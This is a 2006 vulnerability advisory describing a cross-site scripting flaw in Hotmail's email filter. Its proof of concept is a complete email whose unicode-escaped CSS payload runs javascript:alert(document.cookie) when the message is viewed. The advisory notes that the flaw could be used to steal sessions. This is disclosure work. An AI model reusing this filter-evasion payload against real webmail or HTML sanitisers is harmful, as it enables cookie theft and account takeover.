Microsoft MSN Hotmail : Cross-Site Scripting Vulnerability //----- Advisory Program : Microsoft MSN Hotmail Homepage : http://www.hotmail.com Discovery : 2006/01/28 Author Contacted : 2006/03/21 Found by : crashfr at sysdream dot com This Advisory : nono2357 at sysdream dot com //----- Application description Hotmail is one of the most popular free "webmail" email services, which are accessible from anywhere on the planet via a standard web browser. Hotmail is developed by Microsoft. //----- Description of vulnerability Hotmail's filtering engine insufficiently filters javascript scripts. It is possible to write javascript in the BGCOLOR attribute of the BODY tag, using CSS. This leads to execution when the email is viewed. Javascript must be unicode encoded in order to fool the filter. This encoding is recognized with IE >= 6. //----- Proof Of Concept When the user sends the following email : <html> <body bgcolor="#CCCCCC; background-image: url\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0064\006f\0063\0075\006d\0065\006e\0074\002e\0063\006f\006f\006b\0069\0065\0029'\0029"> <p>Found by http://www.sysdream.com !!!</p> </body> </html> The victim receives the following email : <div style="background-color:#CCCCCC;background-image:url\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0064\006f\0063\0075\006d\0065\006e\0074\002e\0063\006f\006f\006b\0069\0065\0029'\0029"> <p>Found by http://www.sysdream.com !!!</p> </div> //----- Impact This vulnerability can be used to modify the webmail display, to gather the victim's cookies, and to steal his session. One is able to download all the victim's emails and address book entries and to send emails from the stolen account. //----- Solution Hotmail should filter javascript in CSS attributes. //----- Credits http://www.sysdream.com http://www.nuitduhack.com/accueil_en-nuit-du-hack-2006.htm crashfr at sysdream dot com //----- Greetings nono2357
